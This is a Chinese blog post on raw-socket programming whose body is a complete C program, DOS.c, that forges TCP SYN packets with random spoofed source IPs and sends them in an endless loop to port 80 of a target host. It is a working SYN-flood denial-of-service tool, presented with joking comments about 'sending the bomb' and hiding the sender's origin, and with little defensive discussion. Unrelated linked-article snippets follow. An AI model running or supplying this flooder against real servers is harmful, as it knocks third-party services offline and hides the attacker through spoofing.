UNIX网络编程——原始套接字(dos攻击)
原始套接字(SOCK_RAW)。应用原始套接字,我们可以编写出由TCP和UDP套接字不能够实现的功能。
注意原始套接字只能够由有 root权限的人创建。
可以参考前面的博客<<UNIX网络编程——原始套接字的魔力【上】>>。
- /******************** DOS.c *****************/
- #include <stdlib.h>
- #include <stdio.h>
- #include <errno.h>
- #include <string.h>
- #include <unistd.h>
- #include <netdb.h>
- #include <sys/socket.h>
- #include <netinet/in.h>
- #include <sys/types.h>
- #include <arpa/inet.h>
- #define DESTPORT 80 /* 要攻击的端口(WEB) */
- #define LOCALPORT 8888
- void send_tcp(int sockfd,struct sockaddr_in *addr);
- unsigned short check_sum(unsigned short *addr,int len);
- int main(int argc,char **argv)
- {
- int sockfd;
- struct sockaddr_in addr;
- struct hostent *host;
- int on=1;
- if(argc!=2)
- {
- fprintf(stderr,"Usage:%s hostname\n\a",argv[0]);
- exit(1);
- }
- bzero(&addr,sizeof(struct sockaddr_in));
- addr.sin_family=AF_INET;
- addr.sin_port=htons(DESTPORT);
- if(inet_aton(argv[1],&addr.sin_addr)==0)
- {
- host=gethostbyname(argv[1]);
- if(host==NULL)
- {
- fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));
- exit(1);
- }
- addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
- }
- /**** 使用IPPROTO_TCP创建一个TCP的原始套接字 ****/
- sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
- if(sockfd<0)
- {
- fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));
- exit(1);
- }
- /******** 设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写 ***/
- setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
- /**** 没有办法,只用超级护用户才可以使用原始套接字 *********/
- setuid(getpid());
- /********* 发送炸弹了!!!! ****/
- send_tcp(sockfd,&addr);
- }
- /******* 发送炸弹的实现 *********/
- void send_tcp(int sockfd,struct sockaddr_in *addr)
- {
- char buffer[100]; /**** 用来放置我们的数据包 ****/
- struct ip *ip;
- struct tcphdr *tcp;
- int head_len;
- /******* 我们的数据包实际上没有任何内容,所以长度就是两个结构的长度 ***/
- head_len=sizeof(struct ip)+sizeof(struct tcphdr);
- bzero(buffer,100);
- /******** 填充IP数据包的头部,还记得IP的头格式吗? ******/
- ip=(struct ip *)buffer;
- ip->ip_v=IPVERSION; /** 版本一般的是 4 **/
- ip->ip_hl=sizeof(struct ip)>>2; /** IP数据包的头部长度 **/
- ip->ip_tos=0; /** 服务类型 **/
- ip->ip_len=htons(head_len); /** IP数据包的长度 **/
- ip->ip_id=0; /** 让系统去填写吧 **/
- ip->ip_off=0; /** 和上面一样,省点时间 **/
- ip->ip_ttl=MAXTTL; /** 最长的时间 255 **/
- ip->ip_p=IPPROTO_TCP; /** 我们要发的是 TCP包 **/
- ip->ip_sum=0; /** 校验和让系统去做 **/
- ip->ip_dst=addr->sin_addr; /** 我们攻击的对象 **/
- /******* 开始填写TCP数据包 *****/
- tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
- tcp->source=htons(LOCALPORT);
- tcp->dest=addr->sin_port; /** 目的端口 **/
- tcp->seq=random();
- tcp->ack_seq=0;
- tcp->doff=5;
- tcp->syn=1; /** 我要建立连接 **/
- tcp->check=0;
- /** 好了,一切都准备好了.服务器,你准备好了没有?? ^_^ **/
- while(1)
- {
- /** 你不知道我是从那里来的,慢慢的去等吧! **/
- ip->ip_src.s_addr=random();
- /** 什么都让系统做了,也没有多大的意思,还是让我们自己来校验头部吧 */
- /** 下面这条可有可无 */
- tcp->check=check_sum((unsigned short *)tcp,
- sizeof(struct tcphdr));
- sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));
- }
- }
- /* 下面是首部校验和的算法,偷了别人的 */
- unsigned short check_sum(unsigned short *addr,int len)
- {
- register int nleft=len;
- register int sum=0;
- register short *w=addr;
- short answer=0;
- while(nleft>1)
- {
- sum+=*w++;
- nleft-=2;
- }
- if(nleft==1)
- {
- *(unsigned char *)(&answer)=*(unsigned char *)w;
- sum+=answer;
- }
- sum=(sum>>16)+(sum&0xffff);
- sum+=(sum>>16);
- answer=~sum;
- return(answer);
- }
UNIX网络编程——原始套接字(dos攻击)的更多相关文章
- UNIX网络编程——原始套接字的魔力【续】
如何从链路层直接发送数据帧 上一篇里面提到的是从链路层"收发"数据,该篇是从链路层发送数据帧. 上一节我们主要研究了如何从链路层直接接收数据帧,可以通过bind函数来将原始套接字绑 ...
- UNIX网络编程——原始套接字的魔力【上】
基于原始套接字编程 在开发面向连接的TCP和面向无连接的UDP程序时,我们所关心的核心问题在于数据收发层面,数据的传输特性由TCP或UDP来保证: 也就是说,对于TCP或UDP的程序开发,焦点在Dat ...
- UNIX网络编程——原始套接字SOCK_RAW
实际上,我们常用的网络编程都是在应用层的报文的收发操作,也就是大多数程序员接触到的流式套接字(SOCK_STREAM)和数据包式套接字(SOCK_DGRAM).而这些数据包都是由系统提供的协议栈实现, ...
- UNIX网络编程——原始套接字的魔力【下】
可以接收链路层MAC帧的原始套接字 前面我们介绍过了通过原始套接字socket(AF_INET, SOCK_RAW, protocol)我们可以直接实现自行构造整个IP报文,然后对其收发.提醒一点,在 ...
- Linux网络编程——原始套接字实例:MAC 头部报文分析
通过<Linux网络编程——原始套接字编程>得知,我们可以通过原始套接字以及 recvfrom( ) 可以获取链路层的数据包,那我们接收的链路层数据包到底长什么样的呢? 链路层封包格式 M ...
- Linux网络编程——原始套接字能干什么?
通常情况下程序员接所接触到的套接字(Socket)为两类: (1)流式套接字(SOCK_STREAM):一种面向连接的 Socket,针对于面向连接的TCP 服务应用: (2)数据报式套接字(SOCK ...
- unix网络编程——TCP套接字编程
TCP客户端和服务端所需的基本套接字.服务器先启动,之后的某个时刻客户端启动并试图连接到服务器.之后客户端向服务器发送请求,服务器处理请求,并给客户端一个响应.该过程一直持续下去,直到客户端关闭,给服 ...
- Linux网络编程——原始套接字编程
原始套接字编程和之前的 UDP 编程差不多,无非就是创建一个套接字后,通过这个套接字接收数据或者发送数据.区别在于,原始套接字可以自行组装数据包(伪装本地 IP,本地 MAC),可以接收本机网卡上所有 ...
- LINUX 网络编程 原始套接字
一 原始套接字 原始套接字(SOCK_RAW)是一种不同于SOCK_STREAM.SOCK_DGRAM的套接字,它实现于系统核心.然而,原始套接字能做什么呢?首先来说,普通的套接字无法处理ICMP.I ...
随机推荐
- vi/vim下tab的长度修改
默认下的长度是8,如果要想修改可以在根目录下新建'.vimrc'文件 里面的内容是: [root@localhost 09:06 ~]# cat .vimrc set tabstop=4 set sh ...
- bzoj 2435: [Noi2011]道路修建
Description 在 W 星球上有 n 个国家.为了各自国家的经济发展,他们决定在各个国家 之间建设双向道路使得国家之间连通.但是每个国家的国王都很吝啬,他们只愿 意修建恰好 n – 1条双向道 ...
- 【bzoj4444 scoi2015】国旗计划
题目描述 A 国正在开展一项伟大的计划 —— 国旗计划.这项计划的内容是边防战士手举国旗环绕边境线奔袭一圈.这项计划需要多名边防战士以接力的形式共同完成,为此,国土安全局已经挑选了 NN 名优秀的边防 ...
- Spring 自带的定时任务Scheduled
1.注解@Scheduled 可以作为一个触发源添加到一个方法中,例如,以下的方法将以一个固定延迟时间5秒钟调用一次执行,这个周期是以上一个调用任务的完成时间为基准,在上一个任务完成之后,5s后再次执 ...
- 如何理解Spring AOP
什么是AOP? AOP(Aspect-OrientedProgramming,面向方面编程),可以说是OOP(Object-Oriented Programing,面向对象编程)的补充和完善.OOP允 ...
- laravel实现支付宝支付功能
起因 前段时间因为项目中需要实现支付宝手机网站支付功能,所以写下这篇文章以作记录,不足之处,欢迎指教. 后端框架:Laravel 5.5 业务功能 适用于商家在移动端网页应用中集成支付宝支付功能.商家 ...
- 关于一些基础的Java问题的解答(五)
21. 实现多线程的两种方法:Thread与Runable 在Java中实现多线程编程有以下几个方法: 1.继承Thread类,重写run方法 public class Test { public s ...
- moment.js常用时间示例,时间管理
'今天': moment() '昨天': moment().subtract(1, 'days') '过去7天':moment().subtract(7, 'days'),moment() '上月': ...
- 吴恩达深度学习第2课第3周编程作业 的坑(Tensorflow+Tutorial)
可能因为Andrew Ng用的是python3,而我是python2.7的缘故,我发现了坑.如下: 在辅助文件tf_utils.py中的random_mini_batches(X, Y, mini_b ...
- 1-学习GPRS_Air202(Air202开发板介绍)
记得自己第一次实现远程通信是在学校里用SIM900A实现的,随着WIFI模块的普及自己就开始用WIFI模块了,当然WIFI模块已经用的很... WIFI模块要想实现远程控制必须连接路由器,其实在做王哥 ...